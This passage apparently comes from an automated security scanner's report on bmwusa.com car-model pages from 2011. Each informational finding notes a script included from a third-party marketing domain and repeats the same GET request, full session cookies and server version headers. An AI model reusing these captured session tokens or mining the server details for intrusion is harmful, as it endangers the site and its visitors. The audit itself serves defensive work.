Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:48 GMT;path=/
Content-Length: 202357


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.59. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isportswagon/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328isportswagon/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:00 GMT;path=/
Content-Length: 213889


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.60. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328isportswagon/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:59 GMT;path=/
Content-Length: 226292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.61. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328isportswagon/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:35:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:55:11 GMT;path=/
Content-Length: 216599


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.62. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivecoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:39 GMT;path=/
Content-Length: 202376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.63. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:09 GMT;path=/
Content-Length: 214938


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.64. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivecoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:47 GMT;path=/
Content-Length: 201402


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.65. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivecoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:33 GMT;path=/
Content-Length: 216450


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.66. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:11:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:31:53 GMT;path=/
Content-Length: 202375


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.67. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/3seriessedanmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:49:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:09:23 GMT;path=/
Content-Length: 202376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.68. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:18 GMT;path=/
Content-Length: 215003


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.69. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:50:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:10:44 GMT;path=/
Content-Length: 201885


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.70. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:27 GMT;path=/
Content-Length: 216441


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.71. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:36:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:36 GMT;path=/
Content-Length: 202621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.72. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
